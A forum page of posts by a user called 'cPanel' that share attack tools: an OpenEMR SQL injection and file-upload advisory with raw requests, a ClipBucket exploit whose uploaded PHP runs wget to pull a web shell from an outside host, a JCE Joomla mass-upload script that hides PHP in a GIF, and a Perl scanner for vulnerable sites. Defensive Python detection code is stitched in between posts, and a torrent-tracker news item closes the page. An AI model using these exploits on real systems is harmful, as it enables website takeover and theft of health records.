Posts posted by cPanel

  1.
    For whoever wants them! A small donation :) I hope they are still good.

  2. #####################################
    # Exploit Title: OpenEMR 4.1.1 Patch 14 Multiple Vulnerabilities
    # Date: Sep 17 2013
    # Exploit Author: xistence < xistence[at]0x90[.]nl >
    # Vendor Homepage: http://www.open-emr.org
    # Tested on: CentOS 5.9 32-bit
    # Affected Version : 4.1.1 Patch 14 and lower
    # Fix: Upgrade to OpenEMR 4.1.2
    # Software details:
    # OpenEMR is a Free and Open Source electronic health records and medical practice management application that can run on
    # Windows, Linux, Mac OS X, and many other platforms. OpenEMR is ONC Complete Ambulatory EHR certified and is one of
    # the most popular open source electronic medical records in use today. OpenEMR is supported by a strong community of
    # volunteers and professionals all with the common goal of making OpenEMR a superior alternative to its proprietary
    # The OpenEMR community is dedicated to guarding OpenEMR's status as a free, open source software solution for #
    # and is dedicated to maintaining a spirit of openness, kindness and cooperation.

    [ SQL Injection ]

    [0x01] - The "authProvider" parameter in the "interface/main/main_screen.php" POST script is
    vulnerable to SQL Injection. A valid "authPass" password is needed before injection is possible (hash below is
    the default password "pass")

    POST /openemr/interface/main/main_screen.php?auth=login&site=default HTTP/1.1
    Host: <IP>
    Referer: http://<IP>/openemr/interface/login/login.php
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 135


    The POST request below could be used to retrieve passwords from other users and gain higher privileges (and after that
    upload a shell)

    [0x02] - The "form_pubid" parameter in the "interface/new/new_comprehensive_save.php" script is
    vulnerable to SQL Injection.

    POST /openemr/interface/new/new_comprehensive_save.php HTTP/1.1
    Host: <IP>
    Referer: http://<IP>/openemr/interface/new/new.php
    Cookie: OpenEMR=blahblahblah
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 286


    [0x03] - The "set_pid" parameter in the "interface/patient_file/summary/demographics.php" script is
    vulnerable to SQL Injection.

    [ Arbitrary file upload ]

    [0x01] - It's possible to upload any file after being authenticated.

    POST /openemr/interface/super/manage_site_files.php HTTP/1.1
    Host: <IP>
    Referer: http://<IP>/openemr/interface/super/manage_site_files.php
    Cookie: OpenEMR=blahblahblah
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------6745387234061449481375110870
    Content-Length: 355

    Content-Disposition: form-data; name="form_image"; filename="pwned.php"
    Content-Type: text/php

    <?php phpinfo(); ?>
    Content-Disposition: form-data; name="bn_save"


  3. ###
    # __________.__ _________ _________
    # \__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __
    # | | | | \_/ __ \ / \ \/\_ __ \/ _ \ \/ \/ / ___/ / \ \/\_ __ \_/ __ \ \/ \/ /
    # | | | Y \ ___/ \ \____| | \( <_> ) /\___ \ \ \____| | \/\ ___/\ /
    # |____| |___| /\___ > \______ /|__| \____/ \/\_//____ > \______ /|__| \___ >\/\_/
    # \/ \/ \/ \/ \/ \/
    # http://thecrowscrew.org
    # Exploit title : ClipBucket Remote Code Execution Vulnerability
    # Author : Gabby
    # Dork = use ur brain
    # Vendor Site : http://clip-bucket.com/
    # Software Download : http://sourceforge.net/projects/clipbucket/
    $options = getopt('t:n:');
    if(!isset($options['t'], $options['n']))
    die("\n [+] Simple Exploiter ClipBucket by Gabby [+] \n Usage : php clip.php -t http://target.com -n bie.php\n

    -t http://target.com = Target mu ..
    -n bie.php = Nama file yang mau kamu pakai...\n\n");

    $target = $options['t'];
    $nama = $options['n'];
    $shell = "{$target}/admin_area/charts/tmp-upload-images/{$nama}";
    $target = "{$target}/admin_area/charts/ofc-library/ofc_upload_image.php?name={$nama}";
    $data = '<?php
    system("wget [url=http://gabby.ga/shell/wso.txt;]CirtexHosting - Site Suspended[/url] mv wso.txt bie.php");
    fclose ( $handle );
    $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
    'Content-Type: text/plain');
    echo "============================================ \n";
    echo ": Simple Exploiter ClipBucket by Gabby :\n";
    echo "============================================ \n\n";
    echo "[+] Upload Shell ke : {$options['t']}\n";
    $handle = curl_init();
    curl_setopt($handle, CURLOPT_URL, $target);
    curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
    $source = curl_exec($handle);
    if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
    echo "[+] Exploit Sukses,.. \n";
    echo "[+] {$shell}\n";
    die("[-] Exploit Gagal,.. \n");


    see on ss :
    1. http://i.imgur.com/SZGVraC.png
    2. http://i.imgur.com/1X0WzeH.png

    Thanks to :
    Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, my "Dad", my sista Wii, cW3 G4pt3K,
    Red-x, Vanda, Deb, Sultan, Meninbox, n all my luvly friend,..
    Greets to :
    Yogyacarderlink, SurabayaBlackhat,..^^

  4. <?             	
    # Priv 2013/02
    <html><body bgcolor="#000000" link="#FF0000" alink="#FF0000" vlink="#FF0000"> <center><form action="" method="post" enctype="multipart/form-data">
    <font color="#C0C0C0" size="7">JCE Joomla Extension Remote File Upload - Priv8</font><p><input type="text" name="shellname" value="a.php"><br><input type="file" name="datafile"><br><textarea cols=50 rows=20 name="sites" >
    <br><input type="submit" name="submit"></p>

    echo "<table border=1 height=100 widh=200 >";

    foreach($sites as $sites2){
    ################### ????? ??????? ????? ????? ##################
    if($sites2['port']==""){ $port=80;}
    else {$port=$sites2['port'];}
    if(!file_get_contents($_FILES['datafile']['tmp_name'])){die ('<h1><font color="red">cu de rola cade a porra da shell</font></h1>');}

    ################### ??????? ???????? ##################
    if(!$connect){echo "<tr><td><font color='white'>http://$siite$path</font></td><td><font color='white'>No Response</font></td><td><a href='http://www.correspondances-manosque.org/cache/jce.php'><font color='white'>Try With Single</font></a></td></tr>"; }

    ################### ??? ???? ??????? gif ##################
    $content = "GIF89a1\n";
    $content .= file_get_contents($_FILES['datafile']['tmp_name']);
    $data = "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
    $data .= "/\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
    $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
    $data .= "0\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n";
    $data .= "Content-Type: image/gif\r\n\r\n";
    $data .= "$content\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "0day\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
    $data .= "upload\r\n";
    $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
    $packet = "POST ".$path."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
    $packet .= "Host: ".$siite."\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
    $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
    $packet .= "Connection: Close\r\n";
    $packet .= "Proxy-Connection: close\r\n";
    $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
    $packet .= $data;
    ################## ?????????????????? ????? ?????? ############

    ############### ?????????? ?????? ???? ??? .php #################
    $packet = "POST ".$path."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
    $packet .= "Host: ".$siite."\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
    $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
    $packet .= "Accept-Encoding: deflate\n";
    $packet .= "X-Request: JSON\r\n";
    $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
    $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"$shellname\"]}";
    $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
    $packet .= $ren."\r\n\r\n";
    ############################ ?????? ?? ???? ????? ###########################################################################
    $packet = "Head ".$path."https://rstforums.com/forum/images/stories/".$shellname." HTTP/1.1\r\n";
    $packet .= "Host: ".$siite."\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";

    while(!feof($connect2)){ $html.=fgets($connect2);}
    if(stristr($html,'200 OK')!=true && !eregi('GIF89a1',$tester)){ echo "<tr><td><font color='red'>http://$siite$path</font></td><td><font color='red'>Exploit Failed</font></td><td><a href='http://www.correspondances-manosque.org/cache/jce.php'><font color='red'>Try With Single</a></font></td></tr>";}
    else{ echo "<tr><td><font color='green'>http://$siite$path</font></td><td><font color='green'>Exploit Succes</font></td><td><a href='$finalsiite'><font color='green'>$finalsiite2</a></font></td></tr>"; }

    echo "</table>";
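
The OpenEMR post uploads a file named `pwned.php` directly, and the JCE post sends PHP behind a `GIF89a1` prefix in a part declared as `image/gif`. As an added example (not code from any of the posts), this Python check parses a multipart body and flags both cases; the extension list, the function names and the sample bodies are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes
from email.policy import HTTP

# Assumed list of extensions a PHP-enabled server would execute; match it to your handler config.
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Heuristic only: a PHP open tag anywhere in the part, e.g. behind a GIF magic prefix.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def inspect_upload(content_type, body):
    """Return (filename, reason) findings for the file parts of one multipart body."""
    # Re-attach the request's Content-Type so the MIME parser can find the boundary.
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    findings = []
    for part in message_from_bytes(raw, policy=HTTP).iter_parts():
        name = part.get_filename()
        if not name:
            continue  # plain form field, no file attached
        if EXEC_EXT.search(name):
            findings.append((name, "executable extension"))
        if PHP_TAG.search(part.get_payload(decode=True) or b""):
            findings.append((name, "PHP tag in content"))
    return findings


def build_body(boundary, parts):
    """Build a constructed multipart body from (field, filename, mime, data) tuples."""
    out = b""
    for field, filename, mime, data in parts:
        disp = f'form-data; name="{field}"'
        if filename is not None:
            disp += f'; filename="{filename}"'
        out += f"--{boundary}\r\nContent-Disposition: {disp}\r\n".encode()
        if mime:
            out += f"Content-Type: {mime}\r\n".encode()
        out += b"\r\n" + data + b"\r\n"
    return out + f"--{boundary}--\r\n".encode()


# Constructed samples shaped like the two uploads described in the posts above.
BOUNDARY = "constructed-boundary-0001"
CT = f"multipart/form-data; boundary={BOUNDARY}"
DIRECT_PHP = build_body(BOUNDARY, [("form_image", "pwned.php", "text/php", b"<?php phpinfo(); ?>"),
                                   ("bn_save", None, None, b"Save")])
DISGUISED = build_body(BOUNDARY, [("Filedata", "0day.gif", "image/gif", b"GIF89a1\n<?php phpinfo(); ?>")])
CLEAN = build_body(BOUNDARY, [("Filedata", "logo.gif", "image/gif", b"GIF89a\x01\x00\x01\x00")])
```

A check on the declared name alone misses the second case, because the file only becomes `.php` through a later rename request; the content check catches it at upload time.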

  5. #!/usr/bin/perl

    use HTTP::Request;

    use LWP::Simple;

    use HTTP::Request::Common;

    print "[+] Private Jce checkeer maded by cPanel \n";

    print "[+] Chose File:";



    open (file, "<$file") || die "[-] Can't open the List of site file !";

    my @file = <file>;

    close file;

    foreach $webs (@file) {

    chomp $webs;

    $site = $webs;

    print "Checking $site \n";

    my $jes1 = "http://".$site."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b";

    my $cik = &get($jes1);

    if ($cik =~ /{"result":null,"error":"No function call specified!"}/g) {

    print "[+]Checking $site Success \n";


    print BEN "$site\n";


    } else {

    print "[-]Checking $site Failed \n";


    print BEN "$site\n";

    close(BEN); }
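
The requests in the JCE and ClipBucket posts leave a recognizable trail in a web server access log: a request to the plugin or upload endpoint, then a fetch of a `.php` file from an upload directory. This added example (not part of the posts) correlates that trail per client address; the combined log format, the verdict labels and the sample lines are assumptions.

```python
import re

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Za-z]+) (?P<uri>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Indicators taken from the requests shown in the posts above.
JCE_PLUGIN = re.compile(r"option=com_jce&.*plugin=imgmanager")
OFC_UPLOAD = re.compile(r"/ofc-library/ofc_upload_image\.php\?name=")
PHP_IN_UPLOAD_DIR = re.compile(r"/(images/stories|tmp-upload-images)/[^/?]+\.php", re.I)
TOOL_UA = "BOT for JCE"

def classify(method, uri, ua):
    """Label one request as 'fetch', 'write', 'probe' or None (unrelated)."""
    if PHP_IN_UPLOAD_DIR.search(uri):
        return "fetch"
    if OFC_UPLOAD.search(uri) or (JCE_PLUGIN.search(uri) and method.upper() == "POST"):
        return "write"
    if JCE_PLUGIN.search(uri) or TOOL_UA in ua:
        return "probe"
    return None

def correlate(lines):
    """Return {client_ip: verdict}, escalating probe -> upload-attempt -> likely-compromise."""
    verdicts = {}
    for line in lines:
        m = LOG_RE.match(line)
        stage = classify(m["method"], m["uri"], m["ua"]) if m else None
        if stage is None:
            continue
        ip, prev = m["ip"], verdicts.get(m["ip"])
        if stage == "fetch" and m["status"] == "200" and prev == "upload-attempt":
            verdicts[ip] = "likely-compromise"  # script served from an upload dir after a write
        elif stage == "write" and prev != "likely-compromise":
            verdicts[ip] = "upload-attempt"
        else:
            verdicts.setdefault(ip, "probe")
    return verdicts

def _line(ip, method, uri, status, ua="-"):
    return f'{ip} - - [01/Mar/2013:10:00:00 +0000] "{method} {uri} HTTP/1.1" {status} 0 "-" "{ua}"'

JCE = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager"
SAMPLE_LOG = [  # constructed lines; addresses are from documentation ranges
    _line("192.0.2.10", "GET", JCE + "&method=form&cid=20", 200),
    _line("198.51.100.7", "POST", JCE + "&method=form&cid=20", 200, "BOT/0.1 (BOT for JCE)"),
    _line("198.51.100.7", "HEAD", "/images/stories/a.php", 200, "BOT/0.1 (BOT for JCE)"),
    _line("203.0.113.5", "POST", "/admin_area/charts/ofc-library/ofc_upload_image.php?name=x.php", 200),
    _line("203.0.113.5", "GET", "/admin_area/charts/tmp-upload-images/x.php", 404),
    _line("192.0.2.99", "GET", "/images/stories/photo.jpg", 200),
]
```

The rename step travels in a POST body and does not appear in a standard access log, so the correlation keys on the write request followed by a successful fetch of a script from the upload directory.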


  6. Today the Romanian torrent tracker "filelist.ro" was shut down, being hosted at PRQ Company, the Swedish hosting company. All sites hosted on the 80.88./19 net are currently unavailable, including but not limited to the torrent sites torrenthound.com, linkomanija and tankafetast, release blog RLSLOG, and the sports streaming sites atdhenet, hahasport, sportlemon and stopstream. Private BitTorrent sites that use PRQ’s services are also affected.

    So the free ride is over...
